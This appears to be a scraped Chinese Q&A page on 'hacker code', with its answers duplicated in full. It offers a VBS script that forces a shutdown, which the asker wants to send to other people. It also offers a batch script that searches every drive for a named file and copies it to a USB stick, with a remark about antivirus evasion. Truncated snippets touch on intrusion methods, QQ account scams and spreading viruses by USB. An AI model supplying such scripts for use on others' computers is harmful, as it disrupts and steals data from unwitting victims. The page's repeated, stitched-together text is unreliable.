伪装黑客的代码可复制
@路所2520:谁能给我个简单的编程代码啊!就是想发给别人,别人打开后能关机的程序,只是想弄着玩玩,求黑客大师啊! -
阙弘19287625746…… 你好! 复制代码: dim s set s=createobject("wscript.shell") s.run"shutdown -s -f -t 60" 到记事本,把后缀改为.vbs 然后你一双击他就在一分钟后关机 ”-t“后的可改就是关机秒数 望采纳谢谢!
@路所2520:给我一个黑客文件是从菜鸟到一般黑客的 -
阙弘19287625746…… 你在记事本中输入shutdown -s,然后在保存时把后缀改为bat
@路所2520:什么是黑客代码 -
阙弘19287625746…… 其实病毒软件代码就是:一些普通的控制代码 你如果真想的话,去学点c++语言吧 (请别侮辱黑客谢谢!黑客不是用来破坏的,黑客是帮人维护)
@路所2520:vbs或bat写出一段代码,能够关键字搜索指定文件并将此文件复制到U盘,黑客或程序员帮帮忙啊! -
阙弘19287625746…… 能不能免杀我不确定事先说明 @echo off set /p p=请输入U盘盘符 set /p w=请输入要找的文件名 for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do dir /s /b %%i:\"%w%" >>%temp%\a.txt 2>nul for /f "delims=" %%i in (%temp%\a.txt) do (copy %%i %p%:\) del %temp%\a.txt pause>nul exit
@路所2520:黑客是怎样通过网络入侵电脑的啊? -
阙弘19287625746…… 黑客是入侵别人电脑的方法有9种. 1、获取口令 这又有三种方法: 一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道...
@路所2520:冒充黑客,骗取QQ号码
阙弘19287625746…… 具体案例: 在某些论坛上有这样的贴子,声称几个黑客成功的潜入了腾讯公司的主页到了一些有价值的数据和漏洞.原理是进入腾讯公司的主页后,他们在服务器上搞了个可以自动读取指令的QQ412630870,公司的管理员就是通过发指令给这...
@路所2520:黑客们在编写扰乱社会和他人的计算机程序,这些代码统称为什么 -
阙弘19287625746…… 木马是一段计算机程序,体积小,善于伪装,在电脑上可以执行(人工或自动),多数利用操作系统命令或指令进行破坏活动,要么造成系统瘫痪,要么盗取账号密码和电脑里的重要信息等编制这类程序的人不一定是黑客,是黑客不一定会编程,
@路所2520:恶意代码 是木马吗? -
阙弘19287625746…… 病毒、蠕虫与特洛伊木马之间的区别? 情形 希望了解有关计算机病毒的更多信息及其与特洛伊木马、蠕虫和谎报的不同. 解释 术语“病毒”通常用作任何恶意代码的通称,该恶意代码事实上并不是真正...
@路所2520:怎么样用u盘传病毒 -
阙弘19287625746…… U盘病毒通过隐藏,复制,传播三个途径来实现对计算机及其系统和网络的攻击的.(1)隐藏.U盘病毒的隐藏方式有很多种: ①作为系统文件隐藏.一般系统文件是看不见的, 所以这样就达到了隐藏的效果;②伪装成其他文件.由于一般计算...
@路所2520:黑客程序为什么被称作特洛伊木马 -
阙弘19287625746…… 特洛伊木马没有复制能力,它的特点是伪装成一个实用工具或者一个可爱的游戏,这会诱使用户将其安装在PC或者服务器上. “特洛伊木马”(trojan horse)简称“木马”,据说这个名称来源于希腊神话《木马屠城记》.古希腊有大军围攻特洛...
阙弘19287625746…… 你好! 复制代码: dim s set s=createobject("wscript.shell") s.run"shutdown -s -f -t 60" 到记事本,把后缀改为.vbs 然后你一双击他就在一分钟后关机 ”-t“后的可改就是关机秒数 望采纳谢谢!
@路所2520:给我一个黑客文件是从菜鸟到一般黑客的 -
阙弘19287625746…… 你在记事本中输入shutdown -s,然后在保存时把后缀改为bat
@路所2520:什么是黑客代码 -
阙弘19287625746…… 其实病毒软件代码就是:一些普通的控制代码 你如果真想的话,去学点c++语言吧 (请别侮辱黑客谢谢!黑客不是用来破坏的,黑客是帮人维护)
@路所2520:vbs或bat写出一段代码,能够关键字搜索指定文件并将此文件复制到U盘,黑客或程序员帮帮忙啊! -
阙弘19287625746…… 能不能免杀我不确定事先说明 @echo off set /p p=请输入U盘盘符 set /p w=请输入要找的文件名 for %%i in (c d e f g h i j k l m n o p q r s t u v w x y z) do dir /s /b %%i:\"%w%" >>%temp%\a.txt 2>nul for /f "delims=" %%i in (%temp%\a.txt) do (copy %%i %p%:\) del %temp%\a.txt pause>nul exit
@路所2520:黑客是怎样通过网络入侵电脑的啊? -
阙弘19287625746…… 黑客是入侵别人电脑的方法有9种. 1、获取口令 这又有三种方法: 一是通过网络监听非法得到用户口令,这类方法有一定的局限性,但危害性极大,监听者往往能够获得其所在网段的所有用户账号和口令,对局域网安全威胁巨大;二是在知道...
@路所2520:冒充黑客,骗取QQ号码
阙弘19287625746…… 具体案例: 在某些论坛上有这样的贴子,声称几个黑客成功的潜入了腾讯公司的主页到了一些有价值的数据和漏洞.原理是进入腾讯公司的主页后,他们在服务器上搞了个可以自动读取指令的QQ412630870,公司的管理员就是通过发指令给这...
@路所2520:黑客们在编写扰乱社会和他人的计算机程序,这些代码统称为什么 -
阙弘19287625746…… 木马是一段计算机程序,体积小,善于伪装,在电脑上可以执行(人工或自动),多数利用操作系统命令或指令进行破坏活动,要么造成系统瘫痪,要么盗取账号密码和电脑里的重要信息等编制这类程序的人不一定是黑客,是黑客不一定会编程,
@路所2520:恶意代码 是木马吗? -
阙弘19287625746…… 病毒、蠕虫与特洛伊木马之间的区别? 情形 希望了解有关计算机病毒的更多信息及其与特洛伊木马、蠕虫和谎报的不同. 解释 术语“病毒”通常用作任何恶意代码的通称,该恶意代码事实上并不是真正...
@路所2520:怎么样用u盘传病毒 -
阙弘19287625746…… U盘病毒通过隐藏,复制,传播三个途径来实现对计算机及其系统和网络的攻击的.(1)隐藏.U盘病毒的隐藏方式有很多种: ①作为系统文件隐藏.一般系统文件是看不见的, 所以这样就达到了隐藏的效果;②伪装成其他文件.由于一般计算...
@路所2520:黑客程序为什么被称作特洛伊木马 -
阙弘19287625746…… 特洛伊木马没有复制能力,它的特点是伪装成一个实用工具或者一个可爱的游戏,这会诱使用户将其安装在PC或者服务器上. “特洛伊木马”(trojan horse)简称“木马”,据说这个名称来源于希腊神话《木马屠城记》.古希腊有大军围攻特洛...